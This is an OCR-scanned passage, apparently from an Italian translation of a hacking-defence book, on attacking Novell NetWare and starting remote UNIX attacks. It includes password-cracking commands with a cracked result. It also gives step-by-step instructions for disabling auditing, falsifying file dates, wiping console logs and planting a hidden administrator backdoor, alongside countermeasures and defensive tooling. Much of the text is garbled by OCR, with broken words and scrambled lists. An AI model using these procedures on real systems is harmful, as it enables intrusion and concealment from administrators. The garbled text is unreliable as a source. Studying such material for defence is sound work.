HR odia È O=HSS 0100010a 0 73b517419af b8ed0978575f36eb3d4890d 
CN=estein 0=HSS 0199010bh 0 bh56fc130f7884b862c5f147e59cf0487? 
C:\novell\Pandora\EKXE}_ 


4. Ora avviate crypto o crypto2 per partire con l'attacco di tipo forza bruta 
oppure con l’ausilio di un dizionario. In questo modo comincerà il cracking 
di password.nds, come mostrato nella figura seguente. 


crypto -u Admin 
crypto2 dict.txt -u deoane 


* CWWINNTXSystem32Xcmd. exe 
C:\novell\Pandora\EXE>crypto2 dict.txt -u deoane 


CRYPT02 - Dictionary Attack 

Comments/bugs: pandora@nmrc.org 

http://www.nmrec .0rg/pandora 

199), 1998 <c) Nomad Mobile Research Centre 

CN=deoane 0=HSS id-019000ff parentID-61909090bh7 objectID-019000ff pulen-5 


read hash — 39575a?4aacBbc736cad587ee16268af 
password — ROGUE 


C:ixnove 11\Pandora\EXE> 


C) Imp 2.0 


Imp, creato da Shade, è un programma a interfaccia grafica che è in grado di ese- 
guire il cracking sia con il metodo forza bruta, sia utilizzando un dizionario. Il dizio- 
nario di cracking è incredibilmente rapido: il tentativo di utilizzare 933.224 parole 
del dizionario richiede solamente un paio di minuti in una postazione Pentium Il a 
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200 MHz. L’unica limitazione di Imp consiste nell’attacco di tipo forza bruta. I nomi 
utente selezionabili per l'elaborazione devono corrispondere a password con la 
stessa lunghezza. Fortunatamente, Imp è in grado di mostrare la lunghezza della 
password accanto al nome utente. È possibile ottenere una copia di Imp all’indiriz- 
zo http://ww.wastelands.gen.nz/. 

I quattro file NDS che sono stati copiati con la tecnica NetBasic, o che sono stati ge- 
nerati dal programma di utilità extract di Pandora, sono block.nds, entry.nds, 
partitio.nds e value.nds. L'unico file che vi occorre per iniziare il cracking è 
partitio.nds. Aprite Imp e caricate il file partitio.nds da disco, quindi selezio- 
nate Dictionary o Brute Force cracking e lasciate che venga eseguito. 

Imp mostra l’intero albero visualizzando gli utenti e la lunghezza della password, 
come mostrato nella Figura 6.8. È importante vedere queste informazioni per le ra- 
gioni elencate di seguito. 


e Potete stabilire la lunghezza della password utilizzata da ciascun utente. 


e Potete orientare i vostri attacchi con il metodo di tipo forza bruta (che po- 
trebbe richiedere un tempo notevole) selezionando solamente le password 
più brevi (non più di sette o otto caratteri). 


i, HSS 

È gia 05HSS | CN=Admin.0=HSS 
 CN=AdmIn [10] CN=jscambray.O=HSS 

- A CN=jscambray [8] |) CN=smoclure.O=HSS 
A CN=smcclure [B] È CNegiouriz. O=HSS 

i CN=mdolphin.O=HSS 

| dia CN=jsymoens DI |cN=deoane.0=HSS 

> & CN=giunte 6) ; 

— & CN=mdolphin [8] 


penna 


 CN=jsmith DI 
A CN=rpaul DI 
| È CN=jhanley |] 
- A ON=mmeadouss [DI 
1 CN=abirchard DI | 
| fa CON=ehammond DI] | 
| É CN=jbenson [0] i 
i 
| 
Ì 


È CN=eculp PI 
À CN=jhomey 10] 

>  CN=tg00dy PD] 

+ È ON=jgoldberg [0] 

— & CN=estein DI 


6.8 


ip fornisce informazioni di grande importanza che possono consentire a un hacker 
are il suo attacco al sistema. 
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Intento sui file di log 


Diffusione: 
Semplicità: 
Impatto: 

Fattore di rischio: 


NI a ax 


Una volta giunti a questo punto, un hacker “serio” adotterà tutte le contromisure 
per coprire le tracce lasciate durante l'attacco. Le pratiche utilizzate consistono nel 
disabilitare l'auditing delle operazioni, nel modificare le informazioni sull'accesso, 
la data e l'ora dei file e nell’intervenire sui file di log. 


® Disabilitare l’auditing 
I pirati più esperti verificano la presenza delle funzioni di auditing e disabilitano al- 
cuni eventi per poter svolgere agevolmente il loro lavoro. Di seguito sono elencati 
alcuni passaggi che devono essere eseguiti per disabilitare l’auditing dei servizi Di- 
rectory Services e dei server. 

1. Avviate SYS:PUBLIC\auditcon. 
. Selezionate Audi! Directory Services. 
. Selezionate il contenitore sul quale volete intervenire e premete il tasto F10. 
Selezionate Auditing Configuration. 
. Selezionate Disable Container Auditing. 


O Ud VI N 


A questo punto sarete in grado di aggiungere contenitori e modificare 
utenti nel contenitore selezionato, senza che l'amministratore ne sia a 
conoscenza. 


® Come modificare gli attributi dei file 


Una volta che un pirata è intervenuto sul file autoexec.ncf, oppure sul file netinfo. 
cfg, molto probabilmente non vorrà essere scoperto; per questo motivo utilizzerà 
SYS:PUBLIC\filer per modificare la data del file. Allo stesso modo del comando 
touch di UNIX e dei sistemi Windows NT, filer è un programma di utilità DOS 
con un'interfaccia a menu per ricercare i file e per modificarne gli attributi. La modi- 
fica della data di un file richiede i passaggi elencati di seguito. 

1. Avviate filer da SYS:PUBLIC. 
Selezionate Manage Files And Directories. 
Trovate la directory in cui risiede il file che cercate. 


Selezionate il file. 


Us 


Selezionate il percorso ViewySet File Information. 


6. Modificate i parametri Last accessed date e Last modified date, come 
nella figura a pagina seguente. 
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4.25 Saturday April 10, 1999 
Context: HSS 
» object: SECRET_5Y8 
ath: SECRETXSY8: 


Attributes: 
Owner: SECRET. 
Inherited rights filter: [SRWCEMPA] 


Trustees: 1 <empty> 

Current effective rights: [SRWCEMFA] 
Owning name spegni 
File size: 962 bytes 
EA size: 0 bytes 


Creation date: 3/27/1999 

Last accessed date: 4/19/1999 

Last archived date: ‘Not archived) 
Last modified date: 4/9/1999 


*=Select Esc=Escape 


Manomissioni ai log di console 


Il metodo di Novell per registrare i messaggi e gli errori di console si basa sul file 
conlog.nlm. Con questo programma vengono registrati tutti gli eventi, compresa la 
rilevazione degli intrusi e il blocco degli utenti (Intruder Detection and Lockout). 
conlog può essere disattivato facilmente. Un hacker, per accedere a rconsole, può 
semplicemente utilizzare il comando unload conlog per fermare la registrazione del 
log; in seguito, con il comando load conlog può riavviare il servizio, utilizzando un 
file console. log pulito. Il file precedente viene cancellato, per cui tutti gli errori e i 
messaggi precedenti sono persi. Un amministratore di sistema esperto potrebbe in- 
terpretare questo fatto come il sintomo di un’intrusione avvenuta o in corso, mentre 
altri amministratori meno capaci potrebbero attribuire questo fatto al caso. 

Gli errori e i messaggi di sistema, generati durante il boot e la normale operatività, 
vengono registrati in modo permanente nel file SYS:SYSTEM\sys$err.log. Avendo 
semplicemente l’accesso al server come amministratore, qualunque hacker può 
aprire il file con un editor e rimuovere i messaggi di log, compresi quelli relativi al 
blocco degli utenti. 


Contromisure alle manomissioni dei log 


Controllate con regolarità i file console. log e sys$err.log. Purtroppo non esiste 
alcuna contromisura valida ed efficace per risolvere queste intrusioni. Può risultare 
praticamente impossibile riuscire a tracciare le operazioni eseguite da amministrato- 
ri (o dagli hacker). Potete comunque attivare l’audit di ciascun file e sperare che 
l'intruso sia troppo sbadato o inesperto per ricordare di disattivare la registrazione 
delle operazioni. 

1, Avviate SYS:PUBLIC\auditcon, 
. Selezionate Audit Configuration. 
. Selezionate Audit By File/Directory. 
. Localizzate i file SYS:ETC\console.log e SYS:SYSTEM\sys$err.log. 
. Selezionate ciascun file e premete il tasto F10 per attivare l’audit. 


2 
3 
4 
5 
6 


. Per concludere uscite. 
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O) Backdoor 


Diffusione: 7 
Semplicità: 7 
Impatto: 10 
Fattore di rischio: 8 


La backdoor più efficace per gli ambienti Novell è quella che gli esperti NetWare vi 
insegnano a non costruire mai: costruire e lasciare oggetti orfani. L'utilizzo di una 
OU (Organizational Unit) nascosta, con un utente amministratore cui sono asse- 
gnati i diritti per il suo contenitore, consente effettivamente di nascondere l’oggetto. 


Per effettuare questa operazione applicate la procedura seguente. 


1. 


2 
3 


6. 


Eseguite la connessione all’albero come Admin o come amministratore. 


. Avviate NetWare Administrator (nwadmn3x. exe). 
. Create un nuovo contenitore in un contesto annidato dell’albero. Fate clic 


con il pulsante destro su una delle OU e createne una nuova selezionando 
Create e scegliendo, poi, Organizational Unit. 

Create un utente nel contenitore. Fate clic con il tasto destro sul contenito- 
re, selezionate Create, poi scegliete User. 

Assegnate all'utente i diritti completi (7rustee Rights) sui suoi oggetti. Fate 
clic con il tasto destro sull’utente, selezionate Trustees Of This Object. Ren- 
dete l’utente un assegnatario esplicito di diritti. 

Assegnate all’utente i diritti completi (Trustee Rights) per il nuovo contenito- 
re. Selezionate il nuovo contenitore. Quindi scegliete Trustees Of This 
Object. Rendete l'utente un assegnatario esplicito di diritti sul nuovo conte- 
nitore, selezionando tutte le voci disponibili, come potete vedere nella figu- 
ra seguente. 


Trustees of audit 
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7. Modificate l’utente per rendere gli attributi di sicurezza equivalenti a quelli 
di un amministratore. Fate clic con il tasto destro sull'utente, selezionate De- 
tails e, quindi, la pagina Security Equivalent To. Fate clic su Add e selezio- 
nate Admin. 

8. Modificate la proprietà /nberited Rights Filter per il contenitore appena cre- 
ato, disabilitando le proprietà Browse e Supervisor (così da non visualizzare 
il contenitore). 


tenitore e del nuovo utente: neanche l'utente Admin è in grado di visua- 
lizzarli. Anche gli altri amministratori non saranno in grado di visua- 
lizzare o cancellare questi oggetti. Questa operazione, che permette di 
eliminare un oggetto NDS, è possibile perché NDS consente anche di sot- 
trarre ad Admin o ad altri amministratori l'autorizzazione di accesso 
agli oggetti. 


i M L'operazione descritta al punto 8 consente la sparizione del nuovo con- 


9, A questo punto è possibile collegarsi attraverso la backdoor appena creata. 
Ricordate che non sarete in grado di visualizzare il nuovo contenitore all’in- 
terno dell’albero delle risorse. Di conseguenza dovrete inserire manualmen- 
te le informazioni relative al contesto, come nella figura seguente. 


| Novell. Client 


Per maggiori informazioni consultate il sito di NMRC (http://www.nmrc.org). 
L’hacker chiamato “Simple Nomad” illustra questa tecnica nel sito Unofficial! Hack 
FAQ (domande frequenti sugli hacking non ufficiali) all'indirizzo http:// 
www.nmrc.org/fags/hackfaq/hackfaq.html. 
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Contromisure all'esecuzione 
di applicazioni su backdoor 


Potete trovare un paio di soluzioni al problema della backdoor: la prima può essere 
ottenuta acquistando un prodotto commerciale; la seconda, invece, è gratuita. 
Il prodotto vero e proprio si chiama EMS/NOSadmin 4.x & 5.x v6 ed è distribuito da 
BindView (http://ww.bindview.com): esso è in grado di individuare qualunque 
oggetto nascosto. 
La seconda soluzione, gratuita, è il programma Hidden Object Locator disponibile 
all'indirizzo http://ww.netwarefiles.com/utils/hobjloc.zip. Questo program- 
ma funziona come file NLM installato sul server ed effettua la scansione dell'albero 
NDS alla ricerca di oggetti che non hanno l’autorizzazione di Browse per l’utente 
connesso (che di solito è un amministratore). La soluzione è valida tenendo conto 
della scarsissima quantità di risorse (87 KB) e del basso prezzo. 
L'unica soluzione indicata da Novell affronta il problema da una prospettiva diver- 
sa. Con SYS:PUBLIC\auditcon è possibile abilitare l’audit degli eventi “Grant Tru- 
stee” (cioè degli eventi che modificano le autorizzazioni di accesso agli oggetti) ap- 
plicando la procedura elencata di seguito. 

1. Avviate auditcon. 
Selezionate Audit Directory Services. 


tw 


Selezionate Audit Directory Tree. 

Attivate l’audit del contenitore prescelto e premete F10. 

Selezionate Enable Container Auditing. 

Premete il tasto Esc fino a quando non raggiungerete il menu principale. 


SD Dr 


Selezionate la voce Enable Volume Auditing per abilitare l’audit sul volume. 
Selezionate Auditing Configuration. 

Selezionate Audit By Event. 

. Selezionate Audit By User Events. 


(e I 
nova 


. Attivate la voce Grant Trustee. 


n Ovviamente questa soluzione presuppone il fatto che l'hacker non sia 
RS abbastanza scaltro da disabilitare la funzione di auditing prima della 
creazione della backdoor. 
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Hacking di UNIX 


Alcuni pensano che il desiderio di ottenere un accesso root a un sistema UNIX sia 
meno devastante della dipendenza indotta da droghe. In realtà la ricerca delle cre- 
denziali di root ha le stesse origini del sistema operativo UNIX. Per questo motivo 
daremo qualche informazione storica sull'argomento. 


Ricerca dell’utente root 


Nel 1969 Ken Thompson e, in seguito, Denis Richie, che lavoravano alla AT&T, decise- 
ro che il progetto per l'evoluzione del sistema operativo MULTICS (Multiplexed Infor- 
mation and Computing System) non stava progredendo con la celerità che essi deside- 
ravano, La loro scelta di mettere insieme un nuovo sistema chiamato UNIX rappresen- 
ta una svolta destinata a cambiare definitivamente il volto dell'informatica. UNIX è sta- 
to progettato per essere un sistema multiutente particolarmente robusto, imbattibile 
nell'esecuzione di applicazioni 0, più specificamente, di piccoli programmi chiamati 
tools (strumenti). I requisiti di sicurezza non facevano parte delle principali caratteristi- 
che progettuali di UNIX, anche se la struttura fondamentale di questo sistema operati- 
vo conteneva componenti intrinseche già concepite come sicure, se implementate cor- 
rettamente. L’accentuata versatilità di UNIX fu il risultato dell’apertura con cui vennero 
affrontati lo sviluppo e l'evoluzione del kernel del sistema, così come degli strumenti e 
dei programmi di utilità che rendevano il sistema così potente. I primi ambienti di svi- 
luppo di UNIX erano collocati all’interno dei laboratori della Bell o nelle università, tut- 
ti luoghi in cui la sicurezza veniva garantita principalmente grazie alla presenza di bar- 
riere e mezzi fisici. Per questo motivo, chiunque avesse accesso fisico al sistema UNIX 
era considerato autorizzato. In molti casi, l'impostazione di una password per l’utente 
root era addirittura considerata di ostacolo alla normale operatività. 

Mentre UNIX e tutti i sistemi da esso derivati hanno subito un’evoluzione enorme nel 
corso dei trenta e più anni trascorsi, l'interesse per i problemi legati alla sicurezza di 
questa famiglia di sistemi operativi non è aumentato. D'altra parte numerosi hacker e 
molti sviluppatori hanno perfezionato (e continuano a farlo tuttora) programmi per 
attaccare i punti deboli del sistema UNIX. La possibilità di rendere pubblici attacchi e 
programmi per l’accesso non autorizzato a UNIX su siti o mailing list dedicate, come 
per esempio Bugtrag, è diventato addirittura motivo di vanto e di onore. In questo ca- 
pitolo cercheremo di capire in che modo e per quali ragioni si sia verificato questo ac- 
canimento, quasi mistico, per riuscire a impossessarsi dell'utente root in un sistema 
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UNIX. Ricordate fin d’ora che nei sistemi UNIX esistono due categorie di utenti: 
l'utente root e tutti gli altri utenti. L'accesso a un sistema UNIX attraverso l’utente root 
non è paragonabile a quello di nessun altro utente. 


Un breve riepilogo 


Riepiloghiamo brevemente quanto abbiamo illustrato nei Capitoli dall’1 al 3. Abbia- 
mo analizzato i metodi per individuare i sistemi UNIX e per ottenere un elenco di ri- 
sorse e informazioni relative. Abbiamo utilizzato lo scanner di porte nmap per con- 
sentire l’identificazione delle porte TCP/UDP e per rilevare i processi e i servizi di- 
sponibili sulla macchina. Abbiamo, inoltre, utilizzato rpcinfo e showmount per otte- 
nere rispettivamente l’elenco dei servizi RPC e dei punti di mount NFS. Abbiamo an- 
che utilizzato il programma netcat (nc) per raccogliere i banner che consentono di 
ottenere informazioni molto utili relative, per esempio, ai vari programmi e alla ver- 
sione utilizzata. In questo capitolo esploreremo l’attacco effettivo al sistema UNIX, 
analizzando tutte le tecniche disponibili. È importante ricordare che, prima di pro- 
cedere con l'attacco vero e proprio al sistema, è necessario svolgere tutte le attività 
di riconoscimento delle risorse disponibili e della rete che abbiamo già illustrato. 
Dovete procedere con metodo e determinazione per assicurarvi di poter rintracciare 
qualunque frammento di informazione disponibile. Dopo aver esaminato tutto il 
possibile, è necessario tentare qualche accesso mirato, per poter identificare i punti 
deboli eventualmente presenti sul sistema oggetto dell'attacco. Potremmo chiamare 
questo processo “compilazione di una mappa dei punti vulnerabili”. 


Mappa dei punti vulnerabili 


La compilazione di una mappa dei punti vulnerabili (in inglese vulnerability map- 
ping) è il processo che consente di creare una corrispondenza tra determinate carat- 
teristiche di sicurezza del sistema e accertati o potenziali punti deboli nei meccani- 
smi di sicurezza. Tra tutte le operazioni di hacking di UNIX, questo è un passaggio 
importantissimo, che non dovrebbe mai essere sottovalutato. È assolutamente ne- 
cessario costruire una mappa degli attributi del sistema: servizi in ascolto, nome e 
versione dei server attivi (per esempio, Apache 1.3.9 utilizzato per i server HTTP e 
sendmail 8.9.10 utilizzato per SMTP), architettura del sistema, e informazioni sugli 
utenti e sulle potenziali falle del sistema. Tutte queste informazioni possono essere 
raccolte con diversi metodi di indagine. 
e È possibile raccogliere informazioni di pubblico dominio sui punti vulnerabili 
del sistema da fonti come Bugtrag, dai bollettini del CERT (Computer Emer- 
gency Response Team, www. cert. org) e dalle informative sulla sicurezza pub- 
blicate dai vari fornitori. Questo metodo può essere abbastanza laborioso, ma 
consente di effettuare un'analisi di tutti i potenziali punti deboli, senza dover 
necessariamente intraprendere un attacco vero e proprio al sistema. 
e Potete utilizzare gli attacchi illustrati sui vari bollettini relativi alla sicurezza, 
in diversi siti, o scrivendo voi stessi i programmi in base alle istruzioni sug- 
gerite. Questo metodo è in grado di rilevare con grande certezza la presen- 
za di punti deboli nel sistema attaccato. 
e Potete utilizzare dei programmi di utilità automatizzati che sono in grado di 
effettuare la scansione dei possibili punti vulnerabili, come Nessus (http:// 
WW.Nessus.org). 
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Ciascuno di questi metodi presenta vantaggi e svantaggi. Ricordate che solamente 
gli hacker alle prime armi (hacker non molto “istruiti”) trascureranno questi mo- 
menti di indagine esplorativa, passando direttamente alle vie di fatto: costoro non 
hanno ancora compreso come dev'essere eseguito un “buon lavoro” di hacking. 
Abbiamo addirittura assistito a casi reali in cui il presunto hacker cercava di intro- 
dursi in sistemi Windows NT utilizzando attacchi studiati per sistemi UNIX. È inutile 
dire che si è trattato di lavoro sprecato. Nell'elenco seguente riassumiamo i precetti 
fondamentali per svolgere un proficuo lavoro di indagine e di mappatura alla ricer- 
ca di punti vulnerabili. 
e Individuate la struttura e la collocazione della rete in cui è presente il siste- 
ma target dell'attacco. 
e Raccogliete informazioni su attributi fondamentali: sistema operativo, archi- 
tettura e versioni delle applicazioni che sono attive per i servizi accessibili. 
In questo modo è possibile risalire a eventuali attacchi conosciuti o punti 
vulnerabili. 
e Individuate i sistemi chiave o più esposti per procedere con maggiore facili- 
tà all'attacco. 
e Elencate i possibili punti di ingresso al sistema e assegnate una priorità a 
ciascuno di essi. 


Accesso remoto o accesso locale? 


Questo capitolo è diviso in due parti, ognuna relativa a una specifica tipologia di 
accesso: remoto o locale. Parliamo di accesso remoto se il sistema viene attaccato at- 
traverso una connessione in rete (per esempio con l'introduzione in un servizio atti- 
vo e in ascolto) oppure attraverso un qualunque canale di comunicazione. Intendia- 
mo invece con accesso locale un attacco che avviene attraverso la console di siste- 
ma o una shell di comandi. Gli attacchi locali al sistema sono anche indicati come 
attacchi privilegiati al sistema. Cercheremo di spiegare l’importanza di questa di- 
stinzione tra i due tipi di accesso. Viene seguita una progressione logica nel tentare 
di sfruttare un punto vulnerabile di un servizio attivo e, successivamente, nel cerca- 
re di ottenere l’accesso a una shell locale di comando. Una volta che ha ottenuto 
l'accesso alla shell, il nostro hacker viene considerato dal sistema utente locale, Cer- 
cheremo di analizzare tutti i tipi di attacco per poter ottenere l'accesso remoto al si- 
stema e forniremo gli esempi più significativi. Una volta ottenuto l'accesso remoto, 
illustreremo i metodi più comuni che consentono la scalata all’utente root. Per con- 
cludere, faremo una panoramica dei metodi che permettono di raccogliere ulteriori 
formazioni relative alla configurazione dei sistemi locali, in modo da preparare le 
si per ulteriori attacchi alle altre macchine della rete. Ricordate comunque che 
lesto capitolo non ha la presunzione di essere un compendio esaustivo sulla sicu- 
ezza dei sistemi UNIX. Vi avvertiamo inoltre che non è possibile trattare in questo 
capitolo tutte le possibili varianti di attacchi relativi alle piattaforme UNIX presenti 
sul mercato. Probabilmente occorrerebbe un libro intero dedicato appositamente a 

sta trattazione: ne è prova Linux Massima sicurezza, Apogeo, 2001. Il nostro 
biettivo è dunque quello di spiegare come funzionano i principali attacchi, in 
nodo da poterne riconoscere anche uno di nuovo tipo. Invece di imboccarvi vi in- 
i (emo a mangiare, in modo che possiate essere autonomi anche in futuro. 
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Accesso remoto 


Come già detto in precedenza, l’accesso remoto comporta un collegamento attra- 
verso la rete o qualche altro canale di comunicazione, come per esempio una con- 
nessione via modem collegato al sistema UNIX. Abbiamo scoperto che i requisiti di 
sicurezza delle connessioni, attraverso modem analogici 0 ISDN, sono assolutamen- 
te carenti. Limiteremo comunque la nostra discussione all'accesso a sistemi UNIX, 
attraverso connessioni di rete, utilizzando il protocollo TCP/IP. Dopo tutto TCP/IP 
rappresenta il pilastro su cui si regge Internet ed è il protocollo di maggiore impor- 


tanza quando si ha a che fare con sistemi UNIX, 


Molti potrebbero tentare di farvi credere che vi sia qualcosa di magico in chi riesce 
a introdursi in un sistema UNIX. In realtà esistono quattro metodi mediante i quali è 


possibile compromettere la sicurezza di UNIX: 


Consideriamo ora alcuni esempi, che ci permetteranno di capire con maggiore pre- 


Li 


i» 


4. 


Applicazione di un attacco conosciuto a un servizio attivo e in ascolto (per 
esempio, TCP/UDP). 

Introduzione attraverso un UNIX che fornisce il supporto alla sicurezza di 
due o più reti interconnesse. 

Attivazione di attacchi che comportano l'esecuzione remota di applicazioni 
dannose (per esempio siti Web intrusivi, trojan inclusi in messaggi di posta 
elettronica e così via). 

Ricorso a un processo o a un programma che imposta la scheda di interfac- 
cia di rete in modalità promiscua. 


cisione le implicazioni coinvolte in ogni tipologia di attacco appena menzionata. 


Applicazione di un attacco conosciuto a un servizio. Qualcuno vi forni- 
sce nome utente e password e vi dice: “Introduciti nel mio sistema”. Questo 
è un esempio di sfruttamento di un servizio esistente. Come potrete intro- 
durvi nel sistema se non è attivo un servizio che consente il login interattivo 
(telnet, ftp, rlogin, oppure ssh)? Che ne sapete dell'ultimo punto debole 
di BIND scoperto la scorsa settimana? Il vostro sistema è invulnerabile? Teo- 
ricamente lo è, ma un hacker potrebbe tentare di introdursi applicando un 
attacco appena scoperto a un servizio, come BIND, in ascolto. A questo 
proposito, ricordate che il servizio dev'essere attivo e in ascolto, per poter 
essere utilizzato come mezzo di penetrazione nel sistema. Un servizio disat- 
tivato non potrà mai essere utilizzato da remoto. 


Introduzione attraverso un altro sistema UNIX. Il vostro firewall UNIX 
è stato utilizzato da un hacker per penetrare nel sistema. Come è stato pos- 
sibile, vi chiederete? Noi, direte, non consentiamo alcun accesso a un servi- 
zio proveniente dall'esterno. In molti casi gli hacker riescono ad aggirare la 
protezione offerta da firewall UNIX facendo partire i pacchetti dal firewall 
stesso verso l'interno della rete. Questo potrebbe anche essere possibile 
perché nel kernel UNIX è stato attivato il servizio IP forwarding, in grado di 
gestire autonomamente i pacchetti anche quando il software di firewall do- 
vrebbe provvedere a questo. Nella maggior parte di questi casi l'applicazio- 
ne di firewall non è stata toccata, ma il sistema posto a “guardia” della rete 
interna è stato utilizzato come router verso la rete aziendale interna. 

Attivazione di attacchi a esecuzione remota. Vi ritenete al sicuro perché 
avete disabilitato tutti i servizi del vostro server UNIX? Probabilmente non 
potete ancora cantare vittoria. Cosa succede se, navigando, vi imbattete nel 
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sito ww. evilhacker.org e il vostro browser Web esegue qualche riga di 
codice che consente a ww.evilhacker.org di riconoscervi e di controllar- 
vi in qualche modo? Pensate alle implicazioni che tutto ciò potrebbe com- 
portare nel momento in cui siete connessi al sistema come utente root, 
mentre navigate su Internet. 


e Attivazione di attacchi in modalità promiscua. Cosa accade se il vo- 
stro sniffer di rete, come tcpdump, è vulnerabile? Volete scommettere che 
il vostro sistema è esposto agli attacchi semplicemente perché controlla il 
traffico? Un hacker potrebbe inviarvi un pacchetto adeguatamente “confe- 
zionato” che potrebbe trasformare il vostro sniffer nel peggiore incubo di 
sicurezza, 


Nei paragrafi seguenti, illustreremo una serie di metodologie di attacco remoto che 
rientrano in una di queste quattro categorie. Se avete qualche dubbio su quale sia la 
categoria alla quale appartiene ciascun attacco remoto a UNIX, ponetevi queste 

semplici domande. 

| 1. Nella tipologia di attacco è coinvolto qualche servizio in ascolto? 

2. Il sistema svolge attività di inoltro del traffico di rete (routing)? 


3. L'utente o il suo software hanno avviato qualche comando che ha minato la 
sicurezza nel sistema attaccato? 


4. La vostra scheda di interfaccia è in modalità promiscua, cioè soggetta a cat- 
turare traffico potenzialmente dannoso? 
Dovreste rispondere in maniera affermativa ad almeno una domanda. 


OD) Attacchi con il metodo della forza bruta 


Diffusione: 8 
Semplicità: 7 
Impatto: 7 


Fattore di rischio: 7 

Cominciamo la nostra analisi dei metodi di attacco a UNIX illustrando l’attacco più 
classico al sistema, cioè il tentativo di indovinare le password attraverso la “forza 
pruta”. Pur non essendo particolarmente elegante, è certamente uno dei mezzi più 
efficaci a disposizione degli hacker per ottenere l’accesso a un sistema UNIX. L'at- 
a forza brame aansiste sampalicamane ma' tantene mratniamanie, var diverse 
rinazioni di nome utente e password, l’accesso a servizi che cercano di autenti- 
l'utente prima di rendersi disponibili, tra i quali ricordiamo: 

telnet; 

FTP (File Transfer Protocol); 

tutti i comandi remoti (rlogin, rsh e così via); 

SSH (Secure Shell); 

nomi di comunità SNMP; 

POP (Post Office Protocol); 

HTTP/HTTPS (Ayper Text Transport Protocol). 

Cercate di ricordare l’importanza dell'individuazione di potenziali nomi utente, aspet- 
to che avevamo già sottolineato quando ci accingevamo a raccogliere ed elencare in- 
formazioni dai sistemi target nei Capitoli 1, 2 e 3. Abbiamo utilizzato servizi come 


e 0 e e ce è 
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finger, rusers e sendmail per identificare potenziali utenti del sistema remoto. Una 
volta che l'hacker è in possesso di una lista affidabile di nomi utente, è in grado di 
tentare l’accesso al sistema target cercando di indovinare la password associata a cia- 
scun ID. Per nostra sfortuna molti utenti hanno scelto una password abbastanza de- 
bole, ovvia o addirittura vuota. La migliore dimostrazione di questo assioma consiste 
nel fatto che il nome utente “Joe” è sempre associato a una password identica al 
nome utente stesso, Considerando un numero crescente di sistemi UNIX, in molti sarà 
contenuta la definizione di questo utente. Durante le nostre ricognizioni di accerta- 
mento dei requisiti di sicurezza abbiamo incontrato migliaia di utenti “Joe”. 

Perché la scelta di password banali è così diffusa? Chiaro e semplice: l'utente non sa 
quali regole deve seguire per la scelta di password sicure, e soprattutto non è obbli- 
gato a farlo. 

Anche se è certamente possibile provare a indovinare la password di questi servizi 
procedendo per successive digitazioni, esistono dei programmi che consentono di 
automatizzare i tentativi di forza bruta. Tra tutti citiamo i seguenti. 


e Brutus(http://ww.hoobie.net/brutus/). 

e brute_web.c(http://packetstormsecurity.com/Exploit Code Archive/ 
brute_web.c). 
pop.c (http://packetstormsecurity/groups/ADM/ADM-pop.c). 
TeeNet (http://ww.phenoelit.de/tn/). 
Pwscan.pl (parte dello scanner Vlad) (http://razor.bindview.com/ 
tools/vlad/index.shtml). 

e SNMPbrute (http://packetstormsecurity.org/Crackers/snmpbrute- 
fixedup.c). 


DÌ Contromisure agli attacchi a forza bruta 


La difesa migliore contro questo tipo di attacco consiste nell’utilizzare password più 
sicure, che non possano essere individuate con facilità. Sarebbe preferibile avere a 
disposizione un meccanismo che non consenta di utilizzare password identiche. 
Abbiamo individuato alcuni strumenti gratuiti, riportati nella Tabella 7.1, che con- 
sentono di rendere più ardua la vita dell’hacker che si volesse cimentare in questi 
attacchi. 


Tabella 7.1 Strumenti gratuiti per la protezione contro gli attacchi a forza bruta 


Strumento Descrizione Reperibilità 

Cracklib Verifica di composizione del- http://www.users.dircon.co.uk/ 
le password. -crypto/download/cracklib, 

2.7.tgz 

Npasswd Programma sostitutivo di —ttp://www.utexas.edu/cc/ 
password. unix/software/npasswd/ 

Secure Remote Un nuovo meccanismo per http://srp.stanford.edu 

Password eseguire autenticazioni sicure 


e scambio di chiavi crittogra- 
fiche in rete. 
OpenSSH Protocollo di connessione re- http://www.openssh.org/ 
mota dotato di cifratura e 
meccanismo di autenticazio- 
ne di tipo RSA. 
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Oltre all'impiego di questi strumenti, è importante implementare buone procedure 
di gestione delle password e affidarsi al buon senso. Considerate quanto è scritto 
qui di seguito. 
è Assicuratevi che tutti gli utenti utilizzino password valide. 
e Costringete gli utenti privilegiati a modificare la password almeno ogni 30 
giorni, e gli altri almeno ogni 60 giorni. 
e La password dovrebbe essere alfanumerica e lunga almeno sei caratteri 
(preferibilmente otto). 
Registrate i tentativi di autenticazione falliti. 
Configurate i servizi affinché eseguano la disconnessione automatica dopo 
tre tentativi consecutivi di connessione falliti. 
e Se possibile, attivate il meccanismo di blocco dei nomi utente (state in guar- 
dia contro gli attacchi DoS lanciati intenzionalmente dall’hacker per blocca- 
re l'accesso agli utenti). 


e Disabilitate i servizi non utilizzati. 


e Utilizzate uno strumento di guida nella scelta della password, che costringa 
gli utenti a utilizzare password sicure. 


Non utilizzate la stessa password per ogni sistema al quale vi collegate. 
Non scrivete mai la vostra password. 

Non comunicate la vostra password a terzi. 

Utilizzate sempre password nuove, del tipo usa e getta. 

Assicuratevi che agli utenti di sistema e predefiniti, come per esempio “se- 
tup” e “admin”, vengano assegnate password personalizzate, 


Per maggiori informazioni sulle linee guida nella politica di scelta delle password, 
potete consultare i bollettini AusCERT (ftp://ft.auscert.org.au/pub/auscert/ 
advisory /AA-93.04.Password.Policy.Guidelines). 


Attacchi data driven 


— Ora che abbiamo spiegato il metodo di attacco più banale, la forza bruta, possiamo 
‘passare a quello che è di fatto il metodo standard per tentare l’accesso remoto ai si- 
stemi UNIX: gli attacchi data driven, che vengono sferrati bombardando un servizio 
i ascolto con una sequenza di dati che produce risultati o errori inaspettati o non 
iderati. Il fatto di considerarli “inaspettati o non desiderati” è ovviamente sogget- 
(dipende da quale punto di vista li si valuta: dell’hacker o dell'amministratore), 
quanto questo genere di comportamento è proprio quanto l’hacker si aspetta, per 
er approfittare della situazione o dell'errore: proprio questo potrebbe consentir- 
‘di accedere al sistema. 
caso in cui siate invece la persona che ha sviluppato il servizio, il vostro pro- 
a riceverà una sequenza di dati che darà luogo a risultati anche disastrosi 
(dal punto di vista della sicurezza del sistema). Gli attacchi data driven possono es- 
re suddivisi in due categorie: attacchi di buffer overflow (dei quali abbiamo già 
atto la conoscenza) e attacchi di validazione dell'input. Di seguito troverete una de- 
zione specifica di ciascuna tipologia. 
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® Buffer overflow 


Diffusione: 8 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9 


Nel novembre 1996, il panorama della sicurezza informatica ha subito un drastico e 
definitivo cambiamento. Il moderatore della mailing list Bugtrag, Aleph One, scrisse 
